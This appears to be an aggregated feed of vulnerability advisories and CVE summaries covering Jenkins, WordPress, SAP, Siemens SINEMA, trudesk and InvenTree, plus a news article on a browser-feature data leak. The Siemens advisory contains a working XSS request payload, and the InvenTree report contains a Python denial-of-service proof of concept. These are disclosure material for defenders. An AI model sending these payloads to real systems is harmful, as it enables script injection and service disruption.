A missing permission check in Jenkins EasyQA Plugin 1.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server.

CVE-2022-34204: Jenkins Security Advisory 2022-06-22

Jenkins Embeddable Build Status Plugin 2.0.3 and earlier allows specifying a `style` query parameter that is used to choose a different SVG image style without restricting possible values, resulting in a relative path traversal vulnerability that allows attackers without Overall/Read permission to specify paths to other SVG images on the Jenkins controller file system.

CVE-2022-34179: Jenkins Security Advisory 2022-06-22

A vulnerability was found in File Manager Plugin 3.0.1. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Bugtraq mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:03:30 +0100  

\------------------------------------------------------------------------
Cross-Site Request Forgery in File Manager WordPress plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the File
Manager WordPress Plugin. Among others, this issue can be used to upload
arbitrary PHP files to the server.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the File Manager WordPress Plugin
version 3.0.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_request\_forgery\_in\_file\_manager\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

**Current thread:**

*   **Cross-Site Request Forgery in File Manager WordPress plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20091: Cross-Site Request Forgery in File Manager WordPress plugin

A vulnerability has been found in Atahualpa Theme and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to basic cross site scripting. The attack can be launched remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:08:41 +0100  

\------------------------------------------------------------------------
Cross-Site Scripting in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A number of Cross-Site Scripting vulnerabilities were found in the
Atahualpa WordPress Theme. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to use the CSRF vulnerability
described in SFY20160759 to trick the admin into storing malicious
input.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_scripting\_in\_atahualpa\_wordpress\_theme.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Cross-Site Scripting in Atahualpa WordPress Theme** _Summer of Pwnage (Feb 28)_

CVE-2017-20085: Cross-Site Scripting in Atahualpa WordPress Theme

The SAP Fiori launchpad suffers from a cross site scripting vulnerability. Various component versions are affected.

    # Onapsis Security Advisory 2022-0005: Cross-Site Scripting (XSS)vulnerability in SAP Fiori launchpad## Impact on BusinessImpact depends on the victim's privileges. In most cases, a successfulattackallows an attacker to hijack a session, or force the victim to performundesiredrequests in the SAP System (CSRF) as well as redirected to arbitrary website(Open Redirect).## Advisory Information- Public Release Date: 06/21/2022- Security Advisory ID: ONAPSIS-2022-0005- Researcher(s): Yvan Genuer## Vulnerability Information- Vendor: SAP- Affected Components:  - SAP\_UI 753  - SAP\_UI 754  - SAP\_UI 755  - SAP\_UI 756  - SAP\_BASIS 787  (Check SAP Note 3149805 for detailed information on affected releases)- Vulnerability Class: CWE-79- CVSS v3 score: 8.2 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N- Risk Level: High- Assigned CVE: CVE-2022-26101- Vendor patch Information: SAP Security NOTE 3149805## Affected Components DescriptionSAP Fiori launchpad is the entry point to ABAP platform for SAP Fiori appsonmobile and desktop devices.## Vulnerability DetailsDuring the navigation in SAP Fiori Launchpad, it is possible to provide acustomtheme name using the url parameter ```sap-theme```. This parameter has anoption to provide the path to a .css file, which it is used directly in thepagegeneration. This optional input is not sufficiently sanitized, allowing anattacker tocontrol and craft any kind of html payload in the page requested.## SolutionSAP has released SAP Note 3149805 which provide patched versions of theaffected components.The patches can be downloaded fromhttps://launchpad.support.sap.com/#/notes/3149805.Onapsis strongly recommends SAP customers to download the relatedsecurity fixes and apply them to the affected components in order toreduce business risks.## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/09/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published## References- Onapsis blogpost:https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities- CVE Mitre:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26101- Vendor Patch:https://launchpad.support.sap.com/#/notes/3149805- Vendor FAQ:https://launchpad.support.sap.com/#/notes/3157089## About Onapsis Research LabsOnapsis Research Labs provides the industry analysis of key securityissues that impact business-critical systems and applications.Delivering frequent and timely security and compliance advisories withassociated risk levels, Onapsis Research Labs combine in-depth knowledgeand experience to deliver technical and business-context with soundsecurity judgment to the broader information security community.Find all reported vulnerabilities athttps://github.com/Onapsis/vulnerability_advisories## About Onapsis, Inc.Onapsis protects the mission-critical applications that run the globaleconomy,from the core to the cloud. The Onapsis Platform uniquely deliversactionableinsight, secure change, automated governance and continuous monitoring forcriticalsystems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendorssuch as SAP,Oracle, Salesforce and others, while keeping them protected and compliant.For more information, connect with us on Twitter or LinkedIn, or visit us athttps://www.onapsis.com.-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail.Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

SAP Fiori Launchpad Cross Site Scripting

Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.4.

@@ -203,7 +203,12 @@ function mainRoutes (router, middleware, controllers) {

router.get('/tickets/print/:uid', middleware.redirectToLogin, middleware.loadCommonData, controllers.tickets.print)

router.get('/tickets/:id', middleware.redirectToLogin, middleware.loadCommonData, controllers.tickets.single)

// router.post('/tickets/postcomment', middleware.redirectToLogin, controllers.tickets.postcomment);

router.post('/tickets/uploadattachment', middleware.redirectToLogin, controllers.tickets.uploadAttachment)

router.post(

'/tickets/uploadattachment',

middleware.redirectToLogin,

middleware.csrfCheck,

controllers.tickets.uploadAttachment

)

router.post('/tickets/uploadmdeimage', middleware.redirectToLogin, controllers.tickets.uploadImageMDE)

  

// Messages

CVE-2022-2128: fix(attachments): file type security fix · polonel/trudesk@fb2ef82

SIEMENS-SINEMA Remote Connect versions 3.0.1.0-01.01.00.02 and below suffer from a cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20220614-0 >  
=======================================================================  
               title: Reflected Cross Site Scripting  
             product: SIEMENS-SINEMA Remote Connect  
  vulnerable version: <=V3.0.1.0-01.01.00.02  
       fixed version: V3.1.0  
          CVE number: CVE-2022-29034  
              impact: medium  
            homepage: https://siemens.com  
               found: 2022-03-01  
                  by: S. Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Siemens is a technology company focused on industry, infrastructure,  
transport, and healthcare.  
 From more resource-efficient factories, resilient supply chains, and smarter  
buildings and grids, to cleaner and more comfortable transportation as well as  
advanced healthcare, we create technology with purpose adding real value for  
customers. By combining the real and the digital worlds, we empower our  
customers to transform their industries and markets, helping them to transform  
the everyday for billions of people."

"SINEMA Remote Connect is the management platform for remote networks. It is a  
server application that enables the simple management of tunnel connections  
(VPN) between headquarters, service technicians, and installed machines or  
plants."

Source: https://www.siemens.com  
Source:   
https://new.siemens.com/global/en/products/automation/industrial-communication/industrial-remote-communication/remote-networks/sinema-remote-connect-access-service.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Reflected Cross Site Scripting (CVE-2022-29034)  
The application contains a reflected cross-site-scripting vulnerability that  
can be used to execute JavaScript code in the victim's browser.

Proof of concept:  
-----------------  
1) Reflected Cross Site Scripting (CVE-2022-29034)  
The error occurs when setting the syslog server to an illegal IP address. An  
error message will pop up and will reflect the supplied IP address. However,  
the popup message does not use the proper JQuery method, and thus allows to  
inject JavaScript code. Note that dots can not be used in the JavaScript  
payload, as they will get filtered by the IP parser that runs beforehand.  
This was circumvented by supplying the JavaScript code in base64.

Following request can be used to trigger the XSS:

POST /services/syslog_client_settings HTTP/1.1  
Host: $host  
Cookie: sessionid=708xmctjzk39og596jp4q4r1udfom4l5;  
csrftoken=sP8NzwJozla1k18xrRzsXiY0zq16IyBddtlDA1C5BC1Orf0oGcqUPr2bpUv1VGLu  
Content-Length: 153  
X-Requested-With: XMLHttpRequest  
X-Csrftoken: U5AQMbPh3JTcdfdBkgIvaLtoitpS7jUVFJNGNGIY50KZkt5szBzX2Uxz8XTNkr4c  
Referer: https://$host/services/syslog_client_settings  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>&port=1234&pr  
otocol=tcp&client_authentication=false&certificate=62&mode=

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* V3.0.1.0-01.01.00.02

Vendor contact timeline:  
------------------------  
2022-04-01: Sending advisory via productcert@siemens.com  
2022-04-01: Issue tracked by Siemens under case #29947  
2022-04-19: Siemens confirms vulnerability. Patch available mid May.  
             Coordinated advisory release date for 2022-06-14.  
2022-06-07: Asking for fixed versions & CVE numbers.  
2022-06-14: Coordinated advisory release.

Solution:  
---------  
Version V3.1.0 fixes our identified issues as well as other security  
vulnerabilities according to the vendor. The firmware can be downloaded here:  
https://support.industry.siemens.com/cs/ww/en/view/109811169/

The vendor published a security advisory as well:  
https://cert-portal.siemens.com/productcert/html/ssa-484086.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2022

SIEMENS-SINEMA Remote Connect 3.0.1.0-01.01.00.02 Cross Site Scripting

Denial of Service in GitHub repository inventree/inventree prior to 0.8.0.

**Description**

The InvenTree application allows for the inclusion of notes for various objects in the application. The notes functionality does not include a character limit. An attacker can submit an infinite number of characters into the notes section, which causes a denial of service and increased processor usage for the victim. The tester tested against the Stock Parts and Parts notes sections. Tester assumes that other objects in the application that have notes available would also be vulnerable, however did not test it due to consumption of local resources.

Tester was able to add in excess of one hundred million (100,000,000) characters or more with the included PoC during testing.

**Proof of Concept**

    import requests as request_handler
    
    burp0_url = "http://192.168.1.5:8000/api/part/1/"
    burp0_cookies = {"csrftoken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "sessionid": "un2jcwzkr7ofla5c3vmfwfjw7z38blj3"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.5:8000/part/1/", "Content-Type": "application/json", "X-CSRFToken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "X-Requested-With": "XMLHttpRequest", "Origin": "http://192.168.1.5:8000", "DNT": "1", "Connection": "close"}
    echo_time = "A"*100000000
    burp0_json={"notes": echo_time}
    request = request_handler.patch(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
    print(request.text)
    print(request.status_code)
    

**Impact**

Should a user visit one of the exploited parts, the vulnerable page will not load appropriately. The victim may see their computer become unresponsive as the processor works to process the amount of data being served by the vulnerable notes section.

**Recommendation**

Apply a consistent character limit across the application where user input can be added to notes sections.

CVE-2022-2134: Lack of Character Limit in Notes Sections Leads to Denial of Service in inventree

In some scenarios, CSS style specifications can be manipulated to cause browsers to send data to an attacker-controlled server

In some scenarios, CSS style specifications can be manipulated to cause browsers to send data to an attacker-controlled server

Scroll to Text Fragment (STTF), a feature that can be used to directly browse to a specific text fragment on a webpage, can be exploited to leak sensitive user information, a security researcher has found.

The exploit, discovered by SecForce’s Maciej Piechota, uses CSS selectors to extract information from the web page and send them to a server controlled by the attacker.

Users can use the STTF feature by using the ‘’ identifier and appending a text string to the URL of a webpage. If the string exists on the page, the browser will directly scroll to it and highlight the relevant section.

**Exfiltrating data using STTF**

“I received a link from a friend which included Scroll to Text Fragment and I started wondering how the highlighting is done on the successful scroll and if it could be customized somehow,” Piechota told The Daily Swig.

STTF uses a special CSS directive to highlight the target text. Piechota found that if a page has a CSS injection vulnerability, an attacker can manipulate style specifications to cause the browser to send data to an attacker-controlled server through attributes that support the ‘url’ function.

**DON’T MISS** Reddit patches CSRF vulnerability that forced users to view NSFW content

“This issue is an example of malicious misuse of a feature, rather than a vulnerability,” Piechota said.

In his write-up of the exploit, Piechota details three different kinds of attacks using the STTF feature. In one proof of concept, the adversary sends a specially crafted URL that reveals to the attacker’s server whether the target is an administrator.

“All of attacks target and can exfiltrate data that is visible on the currently browsed website by the victim,” Piechota said.

STTF was designed with security features to prevent the exfiltration of secret/random data. It also requires user interaction to avoid automated attacks.

Attackers can circumvent some of these safeguards by exploiting the victim’s lack of security awareness via social engineering. Piechota also discovered that an attacker could exploit browser extensions such as adblockers to imitate user clicks, which is needed for the STTF feature to work.

One of the PoCs uses the STTF scheme to reveal the recovery seed phrase of the victim’s cryptocurrency wallet.

**Targeted attacks**

“I would say this technique is handy in two scenarios,” Piechota said. “First: when the attackers find a vulnerability on the site and want to target the administrator out of a group of all users unknown to them.

“Second: when the attacker knows the victim and needs answers to specific questions, like ‘do\[es\] the victim have 2FA enabled?’, or, ‘Did they receive the offer from company A?’”

Read more of the latest infosec research news

According to Piechota, like many cross-site leak (XS-Leak) attacks, the STTF exploit requires some level of social engineering to lure the victim to visit the attacker’s page. “In this case even more so, as we would need to lure the victim to execute certain actions,” he said.

Piechota warned that developers should be aware that even innocent-looking browser features can be exploited by sophisticated attackers. The STTF leak shows that CSS injection bugs can lead to powerful attacks.

“For the users, it’s the same old story – think before opening a link and use up-to-date software,” Piechota said.

**YOU MIGHT ALSO LIKE** RubyGems trials 2FA-by-default in code repo’s latest security effort

Attackers can use ‘Scroll to Text Fragment’ web browser feature to steal data – research

The underConstruction WordPress plugin before 1.20 does not have CSRF check in place when deactivating the construction mode, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Tag

#csrf